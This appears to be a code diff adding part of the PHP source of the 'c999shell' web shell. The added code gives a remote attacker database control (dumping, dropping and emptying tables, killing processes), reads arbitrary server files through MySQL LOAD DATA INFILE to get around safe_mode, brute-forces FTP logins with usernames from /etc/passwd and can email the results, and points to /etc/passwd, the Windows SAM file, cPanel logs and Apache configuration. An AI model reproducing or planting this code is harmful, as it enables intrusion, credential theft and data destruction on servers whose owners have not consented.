+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+}
+echo "</td></tr></table>";
+if ($sql_sock)
+{
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+}
+echo "</table>";
+}
+if ($act == "mkdir")
+{
+if ($mkdir != $d)
+{
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+}
+$act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+echo "<b>Ftp Quick brute:</b><br>";
+if (!win) {echo "This functions not work in Windows!<br><br>";}
+else
+{
+  function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+}
+}
+if ($act == "d")
+{
+if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+else
+{
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+}
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
+if ($act == "security")
+{
+echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+if (!$win)
+{
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+}
+else
+{
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";}
+}
+if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
